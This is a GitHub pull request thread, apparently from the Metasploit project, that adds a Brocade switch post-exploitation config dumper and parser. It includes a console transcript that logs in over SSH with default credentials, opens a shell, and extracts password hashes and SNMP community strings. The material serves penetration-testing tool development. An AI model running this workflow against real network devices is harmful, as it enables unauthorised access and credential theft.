Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Brocade post module and config eater #11927

Merged
merged 4 commits into from Sep 24, 2019

Conversation

@h00die
Copy link
Contributor

commented Jun 2, 2019

This PR adds a Brocade post config dumper and config eater, similar to the juniper and cisco ones.

Verification

It has only been tested against one switch.

  • Start msfconsole
  • pop a shell on a brocade switch
  • post/brocade/gather/enum_brocade
  • set session x
  • Verify it gets the configs and adds the user creds to the db
  • Documentation works and is good
@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jun 2, 2019

This requires #11905 to be completed, at least on the Brocade I own

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 2, 2019

@msjenkins-r7 test this please.

@h00die h00die added the delayed label Jun 2, 2019
@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 4, 2019

Tests should pass once conflicts are resolved.

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jun 5, 2019

Yup, on my to do for tonight. Still need the ssh_login lib fixed as well though

@h00die h00die force-pushed the h00die:brocade branch from 29273fc to bd58fdf Jun 9, 2019
@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jun 9, 2019

Jenkins all fixed, leaving delayed though for the lib fix

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jun 9, 2019

I take that back, i guess there's no reason to not merge it, since it will not work on the tested OLDER device, but it still has a chance to work on newer devices.

@h00die h00die removed the delayed label Jun 9, 2019
@busterb busterb assigned busterb and unassigned busterb Jun 29, 2019
@busterb

This comment has been minimized.

Copy link
Member

commented Jun 29, 2019

I had grabbed this, but then realized that #11905 is needed, which is making progress. Will wait for that to settle out.

@h00die h00die referenced this pull request Jul 8, 2019
1 of 1 task complete
@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jul 16, 2019

@busterb after #12024 its now possible to run this module.

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 auxiliary(scanner/ssh/ssh_login) > set username brocade
username => brocade
msf5 auxiliary(scanner/ssh/ssh_login) > set password Brocade
password => Brocade
msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 2.2.2.2:22 - Success: 'brocade:Brocade' ''
[*] Command shell session 1 opened (1.1.1.1:42859 -> 2.2.2.2:22) at 2019-07-15 21:04:46 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > use post/brocade/gather/enum_brocade 
msf5 post(brocade/gather/enum_brocade) > set session 1
session => 1
msf5 post(brocade/gather/enum_brocade) > run

[!] SESSION may not be compatible with this module.
[*] Getting version information
[*] Gathering info from show configuration
[+] password-display is enabled, hashes will be displayed in config
[+] enable password hash $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
[+] User brocade of type 8 found with password hash $1$f/uxhovU$dST5lNskZCPQe/5QijULi0.
[+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro
[+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw
[*] Post module execution completed
msf5 post(brocade/gather/enum_brocade) > set verbose true
verbose => true
msf5 post(brocade/gather/enum_brocade) > run

[!] SESSION may not be compatible with this module.
[*] In a non-enabled cli
[*] Getting version information
[*] OS: 08.0.30hT311
[+] Version information stored in to loot /root/.msf4/loot/20190715210537_default_2.2.2.2_brocade.version_760937.txt
[*] Gathering info from show configuration
[+] password-display is enabled, hashes will be displayed in config
[+] enable password hash $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
[+] User brocade of type 8 found with password hash $1$f/uxhovU$dST5lNskZCPQe/5QijULi0.
[+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro
[+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw
[*] Post module execution completed
@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jul 17, 2019

Added the local config eater here instead of #12065 for simplicity. Also added a wget and one of my test config files so you can test it too!

@busterb busterb self-assigned this Sep 24, 2019
@busterb

This comment has been minimized.

Copy link
Member

commented Sep 24, 2019

I didn't have a brocade switch to test, but this looks good. Thanks @h00die

busterb added a commit that referenced this pull request Sep 24, 2019
@busterb busterb merged commit 08a0528 into rapid7:master Sep 24, 2019
2 of 3 checks passed
2 of 3 checks passed
Metasploit Automation - Sanity Test Execution Running automation sanity tests. Details available on completion.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@busterb

This comment has been minimized.

Copy link
Member

commented Sep 24, 2019

Release Notes

This adds a Brocade configuration file dumper post-exploitation module and a Brocade configuration file parser for importing data from a Brocade network device.

msjenkins-r7 added a commit that referenced this pull request Sep 24, 2019
@h00die h00die deleted the h00die:brocade branch Sep 30, 2019
@tperry-r7 tperry-r7 added the rn-modules label Oct 1, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.